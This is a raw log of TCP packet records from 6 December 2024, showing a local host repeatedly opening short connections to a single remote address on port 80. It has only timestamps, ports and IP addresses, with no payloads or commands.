Dec 6, 2024 03:12:17.932194948 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:17.932414055 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:17.932862043 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:18.052577019 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:18.280986071 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:18.400640011 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:19.077861071 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:19.123900890 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:19.398199081 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:19.398418903 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:19.398469925 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:19.432904005 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:19.552587986 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:19.713459015 CET	49743	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:19.747740030 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:19.747951984 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:19.833190918 CET	80	49743	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:19.833276987 CET	49743	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:19.833494902 CET	49743	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:19.867634058 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:19.953135967 CET	80	49743	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.186563969 CET	49743	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:20.239362955 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.273153067 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:20.274055004 CET	49744	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:20.306304932 CET	80	49743	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.393246889 CET	80	49737	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.393294096 CET	49737	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:20.393657923 CET	80	49744	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.393718958 CET	49744	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:20.393889904 CET	49744	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:20.513546944 CET	80	49744	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.749053001 CET	49744	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:20.868876934 CET	80	49744	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.868905067 CET	80	49744	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.942823887 CET	80	49743	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:20.998876095 CET	49743	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.257694960 CET	80	49743	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:21.311408997 CET	49743	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.389409065 CET	49743	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.395814896 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.479123116 CET	80	49744	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:21.509392977 CET	80	49743	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:21.510160923 CET	49743	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.515486956 CET	80	49746	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:21.518143892 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.518404007 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.530165911 CET	49744	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.638088942 CET	80	49746	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:21.744002104 CET	80	49744	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:21.787765980 CET	49744	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.874469995 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:21.994185925 CET	80	49746	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:22.608503103 CET	80	49746	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:22.655153990 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:22.862684011 CET	80	49746	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:22.905164003 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.054327965 CET	80	49746	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:23.108280897 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.168423891 CET	49744	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.168510914 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.169377089 CET	49752	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.288335085 CET	80	49744	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:23.288690090 CET	80	49746	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:23.288790941 CET	49744	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.288839102 CET	49746	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.289129972 CET	80	49752	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:23.290101051 CET	49752	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.290283918 CET	49752	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.409962893 CET	80	49752	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:23.639786959 CET	49752	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:23.759654999 CET	80	49752	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:24.380392075 CET	80	49752	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:24.420736074 CET	49752	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:24.660351992 CET	80	49752	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:24.702055931 CET	49752	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:24.852257967 CET	80	49752	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:24.905100107 CET	49752	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:25.164239883 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:25.284873962 CET	80	49758	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:25.284946918 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:25.285113096 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:25.404850960 CET	80	49758	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:25.639802933 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:25.760034084 CET	80	49758	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:26.456103086 CET	80	49758	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:26.498987913 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:26.737772942 CET	80	49758	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:26.750591040 CET	49764	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:26.780106068 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:26.870414972 CET	80	49764	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:26.870493889 CET	49764	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:26.870708942 CET	49764	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:26.933687925 CET	80	49758	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:26.939286947 CET	49764	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:26.983237982 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:26.990389109 CET	80	49764	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:27.059794903 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:27.060518026 CET	49765	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:27.101943016 CET	80	49764	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:27.179878950 CET	80	49758	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:27.179994106 CET	49758	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:27.180179119 CET	80	49765	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:27.180254936 CET	49765	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:27.180457115 CET	49765	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:27.300410032 CET	80	49765	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:27.530302048 CET	49765	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:27.650022030 CET	80	49765	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:27.766480923 CET	80	49764	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:27.767832041 CET	49764	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:28.265367985 CET	80	49765	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:28.311363935 CET	49765	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:28.531339884 CET	80	49765	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:28.577095032 CET	49765	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:28.654726028 CET	49770	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:28.774498940 CET	80	49770	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:28.774615049 CET	49770	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:28.774818897 CET	49770	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:28.894455910 CET	80	49770	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:29.124038935 CET	49770	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:29.243705988 CET	80	49770	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:29.866451979 CET	80	49770	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:29.920739889 CET	49770	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:30.135585070 CET	80	49770	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:30.186376095 CET	49770	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:30.262811899 CET	49770	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:30.263746977 CET	49773	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:30.382813931 CET	80	49770	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:30.382874966 CET	49770	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:30.383414984 CET	80	49773	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:30.383480072 CET	49773	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:30.383677006 CET	49773	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:30.503355026 CET	80	49773	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:30.733330965 CET	49773	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:30.853255033 CET	80	49773	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:31.669938087 CET	80	49773	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:31.717672110 CET	49773	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:31.911076069 CET	80	49773	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:31.952017069 CET	49773	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:31.962361097 CET	49777	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:31.963908911 CET	49752	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:31.963984013 CET	49765	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:32.028812885 CET	49779	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:32.082019091 CET	80	49777	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:32.082108021 CET	49777	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:32.082276106 CET	49777	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:32.148500919 CET	80	49779	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:32.148576021 CET	49779	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:32.148740053 CET	49779	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:32.201926947 CET	80	49777	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:32.268373966 CET	80	49779	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:32.436542988 CET	49777	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:32.498985052 CET	49779	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:32.556508064 CET	80	49777	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:32.556528091 CET	80	49777	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:32.621573925 CET	80	49779	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:33.216016054 CET	80	49777	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:33.264467955 CET	49777	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.288114071 CET	80	49779	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:33.337855101 CET	49779	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.478996992 CET	80	49777	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:33.530086994 CET	49777	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.538263083 CET	80	49779	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:33.592592955 CET	49779	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.677042961 CET	49777	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.677133083 CET	49779	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.684000015 CET	49784	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.799046040 CET	80	49777	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:33.799061060 CET	80	49779	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:33.799118042 CET	49777	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.799140930 CET	49779	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.803788900 CET	80	49784	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:33.803872108 CET	49784	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.804019928 CET	49784	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:33.923719883 CET	80	49784	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:34.155203104 CET	49784	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:34.274998903 CET	80	49784	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:34.888533115 CET	80	49784	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:34.936331987 CET	49784	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:35.170236111 CET	80	49784	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:35.217565060 CET	49784	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:35.294372082 CET	49784	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:35.295305014 CET	49790	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:35.414310932 CET	80	49784	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:35.414396048 CET	49784	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:35.414943933 CET	80	49790	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:35.415033102 CET	49790	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:35.415251017 CET	49790	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:35.534882069 CET	80	49790	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:35.765289068 CET	49790	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:35.885083914 CET	80	49790	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:36.501131058 CET	80	49790	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:36.545742989 CET	49790	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:36.779211044 CET	80	49790	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:36.826961040 CET	49790	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:36.919610023 CET	49790	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:36.921241045 CET	49793	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:37.039649963 CET	80	49790	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:37.039778948 CET	49790	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:37.040947914 CET	80	49793	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:37.041055918 CET	49793	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:37.049571991 CET	49793	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:37.169281960 CET	80	49793	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:37.405260086 CET	49793	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:37.525063038 CET	80	49793	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:38.125881910 CET	80	49793	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:38.170708895 CET	49793	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.357676983 CET	80	49793	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:38.405203104 CET	49793	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.479568958 CET	49793	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.480106115 CET	49797	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.484349012 CET	49798	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.599538088 CET	80	49793	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:38.599628925 CET	49793	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.599781990 CET	80	49797	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:38.599837065 CET	49797	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.599977016 CET	49797	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.604007959 CET	80	49798	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:38.604063988 CET	49798	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.604123116 CET	49798	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.719590902 CET	80	49797	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:38.723830938 CET	80	49798	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:38.952039957 CET	49797	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:38.952152014 CET	49798	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:39.071796894 CET	80	49797	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:39.071930885 CET	80	49798	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:39.071940899 CET	80	49798	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:39.766670942 CET	80	49797	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:39.768667936 CET	80	49798	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:39.811367989 CET	49798	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:39.811368942 CET	49797	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.052148104 CET	80	49798	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:40.053797960 CET	49797	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.068036079 CET	80	49797	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:40.068092108 CET	49797	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.092575073 CET	49798	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.173804998 CET	80	49797	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:40.173873901 CET	49797	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.194096088 CET	49798	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.194866896 CET	49805	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.314069986 CET	80	49798	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:40.314135075 CET	49798	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.314543962 CET	80	49805	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:40.314620018 CET	49805	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.314800024 CET	49805	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.434396029 CET	80	49805	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:40.670769930 CET	49805	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:40.816658974 CET	80	49805	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:41.412849903 CET	80	49805	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:41.467567921 CET	49805	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:41.713032007 CET	80	49805	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:41.764435053 CET	49805	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:41.841185093 CET	49805	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:41.841882944 CET	49810	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:41.961164951 CET	80	49805	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:41.961225986 CET	49805	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:41.961581945 CET	80	49810	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:41.961663008 CET	49810	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:41.961843967 CET	49810	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:42.081485987 CET	80	49810	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:42.311480999 CET	49810	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:42.431245089 CET	80	49810	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:43.145085096 CET	80	49810	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:43.186595917 CET	49810	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:43.410733938 CET	80	49810	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:43.451942921 CET	49810	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:43.529059887 CET	49810	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:43.529779911 CET	49813	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:43.649341106 CET	80	49810	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:43.649419069 CET	49810	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:43.649846077 CET	80	49813	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:43.649920940 CET	49813	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:43.650110006 CET	49813	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:43.769762039 CET	80	49813	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:43.999150038 CET	49813	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:44.120815039 CET	80	49813	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:44.957109928 CET	80	49813	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:44.998809099 CET	49813	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.062258005 CET	49813	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.062767029 CET	49818	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.184668064 CET	49819	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.186213017 CET	80	49813	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:45.186330080 CET	49813	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.186460018 CET	80	49818	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:45.186541080 CET	49818	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.186642885 CET	49818	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.304438114 CET	80	49819	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:45.304574966 CET	49819	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.304759026 CET	49819	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.306480885 CET	80	49818	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:45.427135944 CET	80	49819	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:45.545815945 CET	49818	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.666271925 CET	49819	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:45.670548916 CET	80	49818	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:45.670562983 CET	80	49818	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:45.786031961 CET	80	49819	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:46.305488110 CET	80	49818	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:46.358165026 CET	49818	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:46.435615063 CET	80	49819	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:46.483217955 CET	49819	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:46.766846895 CET	80	49818	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:46.769674063 CET	80	49819	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:46.811295986 CET	49819	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:46.811297894 CET	49818	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:46.888382912 CET	49818	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:46.889200926 CET	49819	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:46.889204979 CET	49825	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:47.010523081 CET	80	49818	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:47.010536909 CET	80	49825	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:47.010548115 CET	80	49819	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:47.010586977 CET	49818	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:47.010629892 CET	49825	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:47.010652065 CET	49819	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:47.010829926 CET	49825	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:47.133152962 CET	80	49825	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:47.358258009 CET	49825	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:47.479815960 CET	80	49825	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:48.097987890 CET	80	49825	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:48.139420033 CET	49825	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:48.373867035 CET	80	49825	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:48.420665026 CET	49825	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:48.692116022 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:48.811861038 CET	80	49828	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:48.811945915 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:48.829791069 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:48.949690104 CET	80	49828	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:49.186410904 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:49.306726933 CET	80	49828	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:49.969049931 CET	80	49828	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:50.014547110 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:50.243714094 CET	80	49828	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:50.295679092 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:50.435467958 CET	80	49828	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:50.483155012 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:50.559762955 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:50.560523033 CET	49833	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:50.679744959 CET	80	49828	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:50.680183887 CET	80	49833	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:50.680249929 CET	49828	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:50.680272102 CET	49833	80	192.168.2.6	172.67.186.200
